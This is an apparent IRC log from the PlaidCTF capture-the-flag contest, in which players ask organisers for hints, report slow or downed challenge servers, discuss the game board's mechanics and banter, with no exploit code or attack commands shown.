  7678. (07:07:52) (wtbw) haha
  7679. (07:07:54) ••• jOin: (irq0) ([email protected])
  7680. (07:07:56) (wtbw) I only joined this morning!
  7681. (07:08:12) (wtbw) what determines when the chronosphere discharges?
  7682. (07:08:14) ••• jOin: (phiber__) ([email protected])
  7683. (07:08:40) (wtbw) (I mean, I know there's a timer, but what starts it?)
  7684. (07:08:54) (auscompgeek) wtbw: nothing starts it, it resets itself (I think)
  7685. (07:09:03) (wtbw) on a regular basis? or decided by admins?
  7686. (07:09:27) (auscompgeek) I believe once the votes are calculated
  7687. (07:09:28) (+frozencemetery) wtbw: it discharges to maintain a certain number of unsolved problems
  7688. (07:09:38) (auscompgeek) oh, really?
  7689. (07:09:40) (wtbw) aha
  7690. (07:09:41) (+frozencemetery) when there are too few, it starts a countdown during which it gathers votes
  7691. (07:09:42) (mrsmith67) !timeleft
  7692. (07:09:46) (auscompgeek) ah, I see.
  7693. (07:09:54) (+frozencemetery) at the end of the countdown, it discharges and a problem is opened
  7694. (07:09:57) (+ricky) 8 hours 50 minutes
  7695. (07:10:01) (wtbw) well everyone vote 6, I'm clearly a reverser at a loose end
  7696. (07:10:01) (wtbw) :p
  7697. (07:10:16) (wtbw) (is soliciting votes allowed? :p)
  7698. (07:10:23) (auscompgeek) I'm confused as to where we are on the board
  7699. (07:10:25) (+ricky) Still enough time to solve bronies 2 maybe!
  7700. (07:10:36) (wtbw) auscompgeek: one of the chances
  7701. (07:10:43) (wtbw) by the magnifying glass
  7702. (07:10:46) (houqp_) auscompgeek: http://play.plaidctf.com/rules
  7703. (07:10:46) ••• qUit: (hu) ([email protected]) Quit: leaving
  7704. (07:11:04) (auscompgeek) ah, I see now
  7705. (07:11:12) (auscompgeek) houqp_: I've read that already :P
  7706. (07:11:23) (auscompgeek) it's hard to see that crosshatching
  7707. (07:11:28) (houqp_) ok :)
  7708. (07:11:42) (auscompgeek) wait, which direction are we going
  7709. (07:13:07) (wtbw) away from the black swirly portal
  7710. (07:13:47) (+frozencemetery) the portal is the connection between the two sides of the board
  7711. (07:13:58) (wtbw) hmm
  7712. (07:14:00) (wtbw) the only one?
  7713. (07:14:06) (wtbw) I thought the run along the top was too
  7714. (07:14:15) (+frozencemetery) no, it also rolls over due to integer overflow :)
  7715. (07:14:20) (+frozencemetery) you can think of it as a metaphor for the all-consuming black hole that is progress
  7716. (07:14:26) (wtbw) lol
  7717. (07:14:26) (+frozencemetery) or you can treat it as a plot device
  7718. (07:14:28) (wtbw) jesus.
  7719. (07:14:37) (+frozencemetery) y'know, whichever lets you sleep at night
  7720. (07:14:46) (wtbw) it would be easier if the board just showed where each roll would get you next
  7721. (07:14:46) (wtbw) ;)
  7722. (07:15:21) (Tapyroe__) is there anyone I can ask a quick question about heartbleed? seem to have some trouble submitting the flag..
  7723. (07:15:38) (+ricky) Tapyroe__: feel free to PM
  7724. (07:16:57) (n00bz) anyone could help me with ezhp?
  7725. (07:17:20) (zoku) I'm struggling with that myself
  7726. (07:17:53) (+frozencemetery) n00bz: still me; feel free to pm
  7727. (07:18:06) (n00bz) lol
  7728. (07:19:46) ••• jOin: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
  7729. (07:20:27) ••• qUit: (kris) ([email protected]) Ping timeout: 258 seconds
  7730. (07:21:20) ••• qUit: (sqrts|stephan) ([email protected]) Ping timeout: 252 seconds
  7731. (07:22:01) (c0ax) Who is familiar with kpop web200?
  7732. (07:22:04) ••• qUit: (netsurf3) ([email protected]) Remote host closed the connection
  7733. (07:22:08) (c0ax) I have few quest.
  7734. (07:23:38) (poppopret) anyone got a hint for doge_stege?
  7735. (07:23:47) (+frozencemetery) c0ax: pm
  7736. (07:23:54) ••• qUit: (Alii) ([email protected]) Ping timeout: 258 seconds
  7737. (07:23:57) (+frozencemetery) poppopret: http://play.plaidctf.com/problems/hints
  7738. (07:24:20) (poppopret) dont see anything there for doge_stege =/
  7739. (07:26:36) ••• jOin: ([pwn]poizan42) ([email protected])
  7740. (07:26:42) ••• jOin: (positron_) (77f5f0c6@gateway/web/freenode/ip.119.245.240.198)
  7741. (07:27:03) ••• qUit: ([GoN]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156) Quit: Page closed
  7742. (07:27:18) (positron_) do i have to bruteforce in mtpox?
  7743. (07:27:31) (c0ax) no
  7744. (07:28:45) (Ymgve) shouldn't it be "saas" not "sass"?
  7745. (07:28:58) (wtbw) less of that sass
  7746. (07:29:58) ••• pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  7747. (07:30:00) (+frozencemetery) before running any brute force, ask: will this finish: in a few minutes? Then it's probably okay. Not before the CTF ends? Then you might not wanna do it.
  7748. (07:30:30) ••• jOin: (chrissing) ([email protected])
  7749. (07:30:52) (Ymgve) and then someone comes with a CTF task that requires you to brute force timestamps - from the future!
  7750. (07:30:57) (Ymgve) (not this CTF tho)
  7751. (07:31:23) (marcoscars02) any help with doge_stege?
  7752. (07:31:36) (marcoscars02) I'm goning crazy xD
  7753. (07:31:41) (LMolr) yeah ef-in doge and crypto 20 :/
  7754. (07:31:42) (poppopret) do we need to script anything for doge_stege?
  7755. (07:31:46) (+frozencemetery) if you've got a question, we can maybe answer it
  7756. (07:31:54) (+frozencemetery) poppopret: if and only if it would help
  7757. (07:32:12) (marcoscars02) I have a strings, but nothing is the flag
  7758. (07:32:23) (positron_) c0ax: so i need bypass strstr?
  7759. (07:32:40) (+frozencemetery) marcoscars02: have you considered getting better strings? :P
  7760. (07:32:49) (c0ax) positron_,
  7761. (07:33:20) (poppopret) better strings? wat.
  7762. (07:33:27) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  7763. (07:33:29) (marcoscars02) frozencemetery, I don't know haha I'm... desperate
  7764. (07:33:39) (c0ax) positron_, no
  7765. (07:33:48) (+frozencemetery) poppopret: you know, strings which as a set contain the key
  7766. (07:33:50) (+frozencemetery) better strings
  7767. (07:33:52) (+frozencemetery) more good
  7768. (07:34:31) (marcoscars02) tss
  7769. (07:34:39) (marcoscars02) hmm
  7770. (07:34:43) ••• jOin: (niph) ([email protected])
  7771. (07:35:22) ••• jOin: (x7r0n) ([email protected])
  7772. (07:36:04) ••• jOin: (jarCrack) ([email protected])
  7773. (07:36:28) (positron_) c0ax: umm, i cant think of anything
  7774. (07:37:10) (niph) hey guys, someone got a hint for _nightmares_ ? Im able to read files and i guess the flag is stored somewhere in a file, but no idea on how to get the file name. Any suggestions?
  7775. (07:37:36) (+ricky) You should get a shell, it's not meant to be solved by just reading the flag file
  7776. (07:38:18) (niph) argh, thanks for the advice :D
  7777. (07:39:22) ••• jOin: (vaivai) (558f7023@gateway/web/freenode/ip.85.143.112.35)
  7778. (07:40:36) (auscompgeek) how does one possibly get a shell from just stdout
  7779. (07:40:49) (cool_guy) this g++ is killing me
  7780. (07:41:36) (poppopret) are you supposed to trace for g++?
  7781. (07:41:56) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  7782. (07:42:05) ••• qUit: (frozencemetery) ([email protected]) Ping timeout: 245 seconds
  7783. (07:42:10) (s_kunk) you can generate an instantiation diagram
  7784. (07:42:32) ••• jOin: (darklapu) ([email protected])
  7785. (07:42:46) (rokko) who solved whatscat, got a non-hint question about it?
  7786. (07:44:12) (+pctf_scoreboard) rokko: discussion of solution paths is not permitted, especially when you have not solved the problem
  7787. (07:45:20) ••• qUit: ([ToH]rbino) ([email protected]) Quit: leaving
  7788. (07:45:21) (rokko) if admin can't help, maybe someone else can...
  7789. (07:45:47) (+pctf_scoreboard) please read the ctf rules, especially #3.
  7790. (07:46:59) (rokko) why are you supposing that i'm sharing solutions or keys?...
  7791. (07:47:12) ••• jOin: (frozencemetery) ([email protected])
  7792. (07:47:13) ••• mOde: (ChanServ) sets (+v frozencemetery)
  7793. (07:47:40) ••• qUit: (ggis) ([email protected]) Ping timeout: 258 seconds
  7794. (07:47:41) (+frozencemetery) rokko: because I'm the one standing at the scoreboard.
  7795. (07:48:29) (rokko) frozencemetery: yup, while talking to you i tel more details than i will tell other ppl, it's obviouse
  7796. (07:48:38) ••• qUit: (guy_) (~guy@unaffiliated/guy/x-2189580) Ping timeout: 255 seconds
  7797. (07:48:52) ••• jOin: (guy_) ([email protected])
  7798. (07:48:59) (+frozencemetery) there is nothing you could possibly ask them that you could not ask in pulbic that would not fall under rule 3.
  7799. (07:50:27) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  7800. (07:51:00) ••• jOin: (chrissing) ([email protected])
  7801. (07:51:51) ••• jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  7802. (07:52:37) (thedoctordmc) Is play.plaidctf.com down again?
  7803. (07:52:43) ••• qUit: (niph) ([email protected]) Quit: Textual IRC Client: www.textualapp.com
  7804. (07:53:17) (+frozencemetery) thedoctordmc: it's maybe a little slow as people wake up, but it looks okay from here?
  7805. (07:53:57) (thedoctordmc) @frozencemetery: got it back now, thanks.
  7806. (07:54:34) (rokko) anyway, it was said, that ppp cannot create good webs, this ctf proves it's true; 'cos web should only require browser to solve it; whatcats requires more...; bye, waste of time on this ctf
  7807. (07:54:38) ••• qUit: (rokko) (5775c785@gateway/web/freenode/ip.87.117.199.133) Quit: Page closed
  7808. (07:54:51) (sven) lol
  7809. (07:55:03) ••• qUit: (jarCrack) ([email protected]) Quit: Verlassend
  7810. (07:55:06) (+frozencemetery) tylerni7: ^
  7811. (07:55:21) ••• qUit: (chrissing) ([email protected]) Ping timeout: 252 seconds
  7812. (07:55:29) (sven) "This CTF is too hard for me! How am I supposed to win when there's other people who are better than me who can solve those challenges?! Screw you, I'm going home!"
  7813. (07:55:36) ••• jOin: (abc123) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
  7814. (07:55:50) (Pitr_) such frustration
  7815. (07:56:00) ••• nIck: (abc123) is now known as (Guest22470)
  7816. (07:56:25) (sven) less x86, moar parlor and rsa and stuff like that plz :)
  7817. (07:56:29) ([pwn]TM) i give it 2/5 on best ragequests ever
  7818. (07:56:40) (Guest22470) web 150
  7819. (07:56:42) (Pitr_) http://i293.photobucket.com/albums/mm62/Floodgates13/AGK.jpg
  7820. (07:56:44) ([pwn]TM) quit*
  7821. (07:57:33) (Pitr_) Although I'd appreciate it if there were more web challenge without login/encryption hacking
  7822. (07:57:58) (Pitr_) or alternatively only release them when I'm awake, american team members keep solving them :(
  7823. (07:58:11) (+frozencemetery) man, I heard somewhere that Angry German Kid was fake, and then I had to re-evaluate, like, my whole existence
  7824. (07:58:54) ••• jOin: (Beched) (6dbc7f66@gateway/web/freenode/ip.109.188.127.102)
  7825. (07:58:57) ••• jOin: (Mawekl) ([email protected])
  7826. (07:59:16) ••• nIck: (Mawekl) is now known as (Mawekl|DrgnS)
  7827. (07:59:43) (+frozencemetery) speaking of re-evaluating one's own existence, I'm the only person awake right now :|
  7828. (08:00:05) ([pwn]TM) frozencemetery: dont worry, we are not bots!
  7829. (08:00:23) (+frozencemetery) [pwn]TM: that sounds just like something a bot would say!
  7830. (08:00:24) (+frozencemetery) haha
  7831. (08:00:53) ([pwn]TM) well, then it is your task to make sure we are people isnt it?
  7832. (08:00:58) (sven) i'm an angry german kid
  7833. (08:01:15) (nopple) where's geobot when you need it
  7834. (08:01:16) (+frozencemetery) [pwn]TM: okay, to prove you're human, solve this ctf :)
  7835. (08:01:52) ••• jOin: (gut) ([email protected])
  7836. (08:02:05) (+frozencemetery) hmm, he's not even in #pwning right now
  7837. (08:02:31) (Pitr_) frozencemetery: what team are you in?
  7838. (08:02:42) (poppopret) isn't he admin?
  7839. (08:02:48) (+frozencemetery) Pitr_: the voiced people (the plus in front of our name) are all PPP
  7840. (08:02:57) (poppopret) ^
  7841. (08:03:08) ([pwn]TM) frozencemetery: you dont tell me what my goals are! i have free will!
  7842. (08:03:15) (Pitr_) oh sorry, didnt bother to look at the user list :-P
  7843. (08:03:17) ••• qUit: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105) Quit: Page closed
  7844. (08:03:23) ••• jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
  7845. (08:03:31) (+frozencemetery) Pitr_: no worries :)
  7846. (08:03:34) (Pitr_) [pwn]TM: and thus began the Butlerian Jihad
  7847. (08:03:35) ••• qUit: (Guest22470) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
  7848. (08:03:45) (+frozencemetery) [pwn]TM: is this a situation where you're gonna solve the ctf, but not because I told you to? :P
  7849. (08:03:47) (mathiasbynens) rendezvous down?
  7850. (08:03:56) (+frozencemetery) mathiasbynens: one second, let me check
  7851. (08:04:00) ••• qUit: (darklapu) ([email protected]) Quit: darklapu
  7852. (08:04:12) • mathiasbynens already tried several Tor identities
  7853. (08:04:45) ••• qUit: (synick) ([email protected]) Quit: leaving
  7854. (08:04:57) ••• jOin: (rvpersie) ([email protected])
  7855. (08:06:39) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  7856. (08:06:56) ••• jOin: (synick) ([email protected])
  7857. (08:07:31) (hbw) anyone I can ask about kappa before I go on a wild goose chase?
  7858. (08:07:42) ••• jOin: (connection) (~connectio@hacktalk/staff/connection)
  7859. (08:07:49) (+frozencemetery) mathiasbynens: so this'll take a minute, but it's likely that it's still working as intended
  7860. (08:07:53) ••• jOin: (ganapati) ([email protected])
  7861. (08:07:53) (+frozencemetery) hbw: sure, hit me
  7862. (08:08:11) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 240 seconds
  7863. (08:09:17) (+frozencemetery) mathiasbynens: yeah it's working
  7864. (08:09:23) ••• jOin: (cool_guy) ([email protected])
  7865. (08:09:28) (danitorwS) could you check wheeee server is answering to encryption strings, please?
  7866. (08:09:46) (+frozencemetery) danitorwS: sure, one second
  7867. (08:10:40) ••• qUit: (mttpgrm) ([email protected]) Ping timeout: 258 seconds
  7868. (08:10:51) (positron_) what should i do after login admin page in mtpox?
  7869. (08:11:21) (+frozencemetery) getting the flag is usually a good route to pursue :)
  7870. (08:11:46) (+frozencemetery) if you've got questions about the problem, feel free to pm me
  7871. (08:12:06) ••• qUit: (poppopret) ([email protected]) Remote host closed the connection
  7872. (08:13:18) ••• jOin: (obvi0us) ([email protected])
  7873. (08:13:34) ••• qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Quit: Page closed
  7874. (08:14:02) ••• jOin: (poppopret) ([email protected])
  7875. (08:14:04) ••• jOin: (mttpgrm) ([email protected])
  7876. (08:15:58) ••• jOin: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248)
  7877. (08:16:27) ••• jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
  7878. (08:18:46) ••• qUit: (gameredan) (~gameredan@unaffiliated/gameredan) Read error: Connection reset by peer
  7879. (08:19:31) ••• jOin: (gameredan) ([email protected])
  7880. (08:19:54) ••• nIck: (gameredan) is now known as (Guest17539)
  7881. (08:20:07) (zTrix_) parlor server seems down?
  7882. (08:20:39) ••• qUit: (eastwolf__) ([email protected]) Ping timeout: 252 seconds
  7883. (08:21:12) (zTrix_) and admin here? parlor (crypto 250) 54.197.195.247:4321 seems down
  7884. (08:21:28) (+frozencemetery) hmm, yes
  7885. (08:21:32) (+frozencemetery) I cna confirm that
  7886. (08:21:34) (+frozencemetery) looking into it
  7887. (08:22:10) ••• jOin: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
  7888. (08:22:33) ••• qUit: (LouTerrailloune) ([email protected]) Ping timeout: 258 seconds
  7889. (08:22:35) ••• jOin: (kris) ([email protected])
  7890. (08:22:35) ••• qUit: (approximatehack) (7aa68c6a@gateway/web/freenode/ip.122.166.140.106) Ping timeout: 240 seconds
  7891. (08:23:35) ••• qUit: (vaivai) (558f7023@gateway/web/freenode/ip.85.143.112.35) Ping timeout: 240 seconds
  7892. (08:24:17) (+frozencemetery) zTrix_: looks up now; try it again?
  7893. (08:24:24) ••• jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7894. (08:25:08) ••• pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7895. (08:25:14) ••• qUit: (stk|) ([email protected]) Quit: stk|
  7896. (08:25:15) ••• jOin: ([SF]testdata) (75d9b8dc@gateway/web/freenode/ip.117.217.184.220)
  7897. (08:26:14) ••• qUit: (Gynvael) ([email protected]) Ping timeout: 252 seconds
  7898. (08:29:54) (positron_) the flag of mtpox in database?
  7899. (08:30:33) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  7900. (08:30:44) ••• qUit: (braoru) ([email protected]) Quit: braoru
  7901. (08:31:18) ••• jOin: (ramsexy) ([email protected])
  7902. (08:32:09) ••• jOin: (Gynvael) ([email protected])
  7903. (08:32:44) ••• jOin: (sqrts|stephan) ([email protected])
  7904. (08:33:08) (+frozencemetery) mtpox does indeed have a flag which is checked against our database, yes.
  7905. (08:33:22) (synick) lol
  7906. (08:33:44) ••• jOin: (eastwolf__) ([email protected])
  7907. (08:33:45) (+frozencemetery) positron_: if you've got questions about mtpox or any other problem, feel free to pm me
  7908. (08:34:27) ••• qUit: (_simo) ([email protected]) Ping timeout: 258 seconds
  7909. (08:35:16) ••• jOin: (br0ns) ([email protected])
  7910. (08:36:09) ••• jOin: (oscalation) (~Home@unaffiliated/oscalation)
  7911. (08:36:15) ••• jOin: (ggis) ([email protected])
  7912. (08:36:33) (oscalation) can i ask for help on the first tile here? just a noob. MTPOX
  7913. (08:39:46) ••• jOin: (pcc7_) (c0518434@gateway/web/freenode/ip.192.81.132.52)
  7914. (08:40:00) (stypr_irccloud) woke up. looking for ponies
  7915. (08:41:05) ••• qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
  7916. (08:42:10) (+frozencemetery) oscalation: stypr_irccloud: pm me, but expect a delay; all the player just woke up it seems
  7917. (08:42:29) (stypr_irccloud) lol
  7918. (08:42:35) ••• jOin: (PauseSave) ([email protected])
  7919. (08:44:45) ••• qUit: (T1mb0) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- *I* use it, so it must be good!
  7920. (08:46:44) ••• jOin: (_simo) ([email protected])
  7921. (08:49:27) ••• qUit: (Digihash) ([email protected]) Remote host closed the connection
  7922. (08:49:52) (ius) stupid ponies
  7923. (08:49:52) (spq) damn, i hat harry potter now
  7924. (08:49:56) (ius) i used to be a brony
  7925. (08:49:59) (ius) NOT ANYMORE
  7926. (08:50:21) (ius) who can i bug about bronies?
  7927. (08:50:39) (+frozencemetery) me
  7928. (08:50:46) (+frozencemetery) I'm the only one awake, so you're stuck with me :)
  7929. (08:50:47) (fasmotol) whom to can i pm about hudak and ezhp?
  7930. (08:50:52) • +frozencemetery up-enter
  7931. (08:50:59) ••• pArt: (c0ax) ([email protected]) "Leaving"
  7932. (08:51:38) (pez) lol
  7933. (08:57:18) ••• jOin: (c0ax) ([email protected])
  7934. (09:00:35) ••• qUit: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248) Ping timeout: 240 seconds
  7935. (09:03:24) ••• qUit: (gut) ([email protected]) Remote host closed the connection
  7936. (09:04:16) ••• jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7937. (09:04:31) ••• pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7938. (09:04:47) ••• jOin: (handlr) (~handlr@unaffiliated/handlr)
  7939. (09:06:01) ••• jOin: (zoff_ita) ([email protected])
  7940. (09:06:17) ••• jOin: (naam) ([email protected])
  7941. (09:06:40) ••• qUit: (s_kunk) ([email protected]) Ping timeout: 245 seconds
  7942. (09:07:33) ••• jOin: (gut) ([email protected])
  7943. (09:07:42) ••• pArt: (fasmotol) ([email protected])
  7944. (09:07:43) (+frozencemetery) my apologies; anyone who pm'd me in the last 10 minutes and who has not yet received a reply should do so again
  7945. (09:07:47) (+frozencemetery) my laptop battery just died
  7946. (09:08:42) (Gynvael) frozencemetery: I was asking about pwn1000
  7947. (09:09:21) (+frozencemetery) yes please pm me again
  7948. (09:09:32) (+frozencemetery) :P
  7949. (09:10:42) ••• qUit: (Saxophie) ([email protected]) Ping timeout: 276 seconds
  7950. (09:11:16) ••• jOin: (muchacho) ([email protected])
  7951. (09:11:23) ••• qUit: (gut) ([email protected]) Client Quit
  7952. (09:14:04) (NK_) so ricky
  7953. (09:14:08) (NK_) you finally opened your task ?
  7954. (09:14:37) (+frozencemetery) (he's asleep)
  7955. (09:14:42) ••• jOin: (gut) ([email protected])
  7956. (09:14:50) (+frozencemetery) but yes, his killer problem is in fact open
  7957. (09:15:05) ••• qUit: (nateloaf) ([email protected]) Quit: Leaving.
  7958. (09:15:13) ••• pArt: (sqrts|stephan) ([email protected])
  7959. (09:15:19) ••• qUit: (slipper) ([email protected]) Remote host closed the connection
  7960. (09:16:14) (hellman_) gg dragon sector!
  7961. (09:17:54) (synthverity) So, who here has not slept for the entire thing?
  7962. (09:17:54) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  7963. (09:18:27) (tokki) how much more of ctf-ing?
  7964. (09:18:58) (Gynvael) 7 h
  7965. (09:19:06) (Gynvael) well, 6:40
  7966. (09:19:34) (+frozencemetery) nice job dragon sector
  7967. (09:19:53) (oscalation) anyone here planing on writing a blog post about the ctf for solutions after the contest ends?
  7968. (09:20:00) ••• jOin: (nateloaf) ([email protected])
  7969. (09:20:31) (foundation) oscalation: it's in the rules
  7970. (09:20:37) (+frozencemetery) ooh, discharge in 15 minutes. Sometimes it's nice to be behind :)
  7971. (09:20:39) (foundation) if you want $$$ , gota make writeups
  7972. (09:20:55) (oscalation) ah nice, where would i find the writeups?
  7973. (09:20:59) (foundation) frozencemetery: what are the options
  7974. (09:21:10) (foundation) oscalation: watch out for those at ctftime.org
  7975. (09:21:16) (|x_x|) oscalation: google, ctfitime, etc.
  7976. (09:21:35) (+frozencemetery) foundation: looks like... a reversing, a pwnable, or a forensics
  7977. (09:21:54) (wtbw) frozencemetery: what number for the reversing?
  7978. (09:21:57) (foundation) chanses are blocked?
  7979. (09:22:12) (+frozencemetery) foundation: well, you can always choose a chance unless the previous choice was a chance
  7980. (09:22:21) (foundation) ok
  7981. (09:24:34) ••• qUit: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69) Quit: Page closed
  7982. (09:25:36) ••• qUit: (pcc7_) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
  7983. (09:25:57) ••• jOin: (ccmndhd) ([email protected])
  7984. (09:27:07) (LMolr) who can i ping for freya
  7985. (09:28:51) (+frozencemetery) me
  7986. (09:28:56) (tokki) lol
  7987. (09:29:01) (+frozencemetery) not only is it my problem, but I'm the only one awake right now :)
  7988. (09:29:40) ••• qUit: (criple_ripper) ([email protected]) Ping timeout: 250 seconds
  7989. (09:29:42) ••• jOin: (Sliden) ([email protected])
  7990. (09:29:45) ••• qUit: (snoopybbt) ([email protected]) Quit: Leaving.
  7991. (09:29:54) ••• jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7992. (09:29:58) ••• jOin: (_bcc) ([email protected])
  7993. (09:30:21) ••• pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  7994. (09:30:33) (DonnchaC) Can I PM someone about kpop?
  7995. (09:31:34) (+frozencemetery) DonnchaC: hit me
  7996. (09:32:42) ••• jOin: (criple_ripper) ([email protected])
  7997. (09:32:44) ••• jOin: (ciliated) (99bd4541@gateway/web/freenode/ip.153.189.69.65)
  7998. (09:34:03) ••• jOin: (naam) ([email protected])
  7999. (09:34:23) (ciliated) is kpop sqli?
  8000. (09:34:35) ••• qUit: (ggis) ([email protected]) Ping timeout: 240 seconds
  8001. (09:35:29) (+pctf_scoreboard) I guess I'd rather have network problems than infra problems, but MAN this is rediculous
  8002. (09:36:05) ••• qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Remote host closed the connection
  8003. (09:36:40) ••• qUit: (frozencemetery) ([email protected]) Ping timeout: 245 seconds
  8004. (09:36:41) ••• jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
  8005. (09:36:47) (n00bz) you guys should have build a paged scoreboard
  8006. (09:37:10) (+pctf_scoreboard) but then we couldn't be obnoxiously web2.0!
  8007. (09:37:16) ••• jOin: (s_kunk) ([email protected])
  8008. (09:40:38) ••• qUit: (razvanc) ([email protected]) Remote host closed the connection
  8009. (09:41:10) (+pctf_scoreboard) ooh, new problem
  8010. (09:41:27) (+pctf_scoreboard) y'all nerds chose forensics :P
  8011. (09:42:14) ••• jOin: (geobot) ([email protected])
  8012. (09:42:16) ••• jOin: (frozencemetery) ([email protected])
  8013. (09:42:17) ••• mOde: (ChanServ) sets (+v frozencemetery)
  8014. (09:42:21) ••• jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  8015. (09:42:22) ••• qUit: (Knight1) ([email protected]) Quit: Try HydraIRC -> http://www.hydrairc.com <-
  8016. (09:42:32) (+pctf_scoreboard) nopple: ^
  8017. (09:42:36) (LuckyY) srsly? 35,0KB/s
  8018. (09:42:37) (hellman_) what's right name for Pinkie Pie ?
  8019. (09:43:03) (+pctf_scoreboard) geobot: woo!
  8020. (09:43:20) ••• qUit: (naam) ([email protected]) Ping timeout: 245 seconds
  8021. (09:44:20) (Ymgve) is the slow bbos speed part of the challenge? :)
  8022. (09:44:37) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  8023. (09:44:48) (+frozencemetery) Ymgve: depends, will it make you happier if I say yes? :)
  8024. (09:45:03) ••• pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  8025. (09:45:08) (Ymgve) well, gained speed now at least
  8026. (09:45:32) (+frozencemetery) only because you threatened it :P
  8027. (09:45:39) ••• jOin: (nonroot) ([email protected])
  8028. (09:46:43) (nopple) geobot: can you give me a hint on pwn1000?
  8029. (09:46:44) (geobot) query me see your appoach might work i stop giving a hint as keyworkds
  8030. (09:47:06) ••• qUit: (oscalation) (~Home@unaffiliated/oscalation) Quit: Leaving.
  8031. (09:47:35) ••• qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
  8032. (09:47:50) (ciliated) i think kpop is much difficult than whatscat :(
  8033. (09:49:29) (Xteven) is web800 down?
  8034. (09:50:07) ••• qUit: (muchacho) ([email protected]) Ping timeout: 252 seconds
  8035. (09:50:10) (+frozencemetery) Xteven: no, just slow
  8036. (09:50:46) (Xteven) ok
  8037. (09:51:38) ••• jOin: (chrissing) ([email protected])
  8038. (09:52:09) ••• jOin: (shhdup) ([email protected])
  8039. (09:52:21) (NK_) cai_: "Last submission 2 days ago
  8040. (09:52:26) (NK_) it's getting worse ! :)
  8041. (09:54:57) (haoz) web 150 .. anyone ?
  8042. (09:54:58) (geobot) those 150 people in #pwning -> https://twitter
  8043. (09:55:28) (+frozencemetery) haoz: hit me
  8044. (09:55:47) ••• qUit: (chrissing) ([email protected]) Ping timeout: 240 seconds
  8045. (09:57:53) (n00bz) 6 hrs left?
  8046. (09:58:01) (+frozencemetery) indeed!
  8047. (09:58:17) ••• qUit: (nonroot) ([email protected]) Ping timeout: 250 seconds
  8048. (09:58:29) (+frozencemetery) \insanitywolf{6 hours left in pctf}{better go sleep}
  8049. (09:58:56) (ryan-c) I *just* noticed the jumanji background image
  8050. (09:59:18) (stypr_irccloud) web800 is so difficult
  8051. (10:00:19) (ryan-c) it's 800 points total
  8052. (10:01:56) (+frozencemetery) it is the biggest egg
  8053. (10:01:59) (+frozencemetery) so big
  8054. (10:02:06) (mak`) can i talk to someone about zfs?
  8055. (10:02:40) (ryan-c) frozencemetery: you clearly use latex too much
  8056. (10:02:46) (+frozencemetery) mak`: hit me
  8057. (10:02:52) ••• jOin: (naam) ([email protected])
  8058. (10:02:59) (+frozencemetery) ryan-c: yeah I've written more latex than code at this point. It's not great
  8059. (10:03:37) • ryan-c eyes parlor
  8060. (10:03:51) (n00bz) ryan-c, hf=
  8061. (10:03:53) (n00bz) ?
  8062. (10:03:54) (bool101) how many times has bronies 1 been solved?
  8063. (10:04:16) (+frozencemetery) bool101: you can see that by clicking its square on the gameboard
  8064. (10:05:09) (ryan-c) it doesn't actually show that
  8065. (10:05:11) ••• jOin: (snoopybbt) ([email protected])
  8066. (10:05:12) (bool101) I see the top three solves there but where is the total?
  8067. (10:05:13) ••• qUit: (shik) ([email protected]) Read error: Connection reset by peer
  8068. (10:05:21) ••• jOin: (shik) ([email protected])
  8069. (10:05:22) ••• qUit: (naam) ([email protected]) Client Quit
  8070. (10:06:39) ••• jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  8071. (10:07:42) (factoreal) help for forensic_450
  8072. (10:07:47) ••• qUit: (ramsexy) ([email protected]) Ping timeout: 240 seconds
  8073. (10:07:58) ••• qUit: (pez) ([email protected]) Ping timeout: 258 seconds
  8074. (10:08:01) (factoreal) who working on forensic_450(RSA)?
  8075. (10:08:18) (nopple) geobot: halp!
  8076. (10:08:44) (nopple) geobot: i am disappoint
  8077. (10:09:09) (whois) tooooooo slow bbos
  8078. (10:10:15) (+tylerni7) sorry everyone
  8079. (10:10:17) (+tylerni7) I just woke up
  8080. (10:10:27) (+tylerni7) feel free to pm me now
  8081. (10:10:55) (ryan-c) factoreal: try inverting the algebraic splines
  8082. (10:11:25) (+tylerni7) [GoN]Jakkdu: ping
  8083. (10:11:34) (+tylerni7) pm me if you're around
